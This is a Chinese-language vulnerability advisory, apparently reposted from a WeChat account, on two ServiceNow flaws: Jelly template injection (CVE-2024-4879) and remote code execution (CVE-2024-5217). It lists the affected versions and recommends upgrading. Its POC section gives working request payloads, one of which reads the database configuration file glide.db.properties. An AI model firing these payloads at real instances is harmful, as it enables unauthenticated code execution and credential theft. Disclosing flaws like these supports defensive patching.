ServiceNow Jelly模板注入和远程代码执行漏洞

admin 2024年7月23日09:17:36评论23 views字数 1457阅读4分51秒阅读模式
0x00 漏洞编号
  • CVE-2024-4879

  • CVE-2024-5217

0x01 危险等级
  • 高危
0x02 漏洞概述

ServiceNow是一个业务转型平台。通过平台上的各个模块,ServiceNow可用于从人力资源和员工管理到自动化工作流程或作为知识库等各种用途。

ServiceNow Jelly模板注入和远程代码执行漏洞

0x03 漏洞详情
CVE-2024-4879
漏洞类型:Jelly模板注入
影响:执行任意代码
简述:ServiceNow存在Jelly模板注入漏洞,由于ServiceNow的Jelly模板输入验证不严格,导致未经身份验证的远程攻击者可通过构造恶意请求利用,在ServiceNow中远程执行代码,获取数据库配置等等,使系统处于极不安全的状态。
CVE-2024-5217
漏洞类型:远程代码执行
影响:执行任意代码
简述:ServiceNow存在远程代码执行漏洞,由于ServiceNow的输入验证不完整,导致未经身份验证的远程攻击者可通过构造恶意请求利用,在ServiceNow中远程执行代码,获取数据库配置等等,使系统处于极不安全的状态。
0x04 影响版本
  • ServiceNow < Utah Patch 10 Hot Fix 3
  • ServiceNow < Vancouver Patch 6 Hot Fix 2
  • ServiceNow < Vancouver Patch 7 Hot Fix 3b
  • ServiceNow < Vancouver Patch 8 Hot Fix 4
  • ServiceNow < Vancouver Patch 9
  • ServiceNow < Vancouver Patch 10
  • ServiceNow < Washington DC Patch 1 Hot Fix 2b
  • ServiceNow < Washington DC Patch 2 Hot Fix 2
  • ServiceNow < Washington DC Patch 3 Hot Fix 1
  • ServiceNow < Washington DC Patch 4

0x05 POC

# CVE-2024-4879{{BaseURL}}/login.do?jvar_page_title=<style><j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style># CVE-2024-5217{{BaseURL}}/login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>

0x06 修复建议

目前官方已发布漏洞修复版本,建议用户升级到安全版本
https://www.servicenow.com/

原文始发于微信公众号(浅安安全):漏洞预警 | ServiceNow Jelly模板注入和远程代码执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月23日09:17:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ServiceNow Jelly模板注入和远程代码执行漏洞http://cn-sec.com/archives/2988521.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息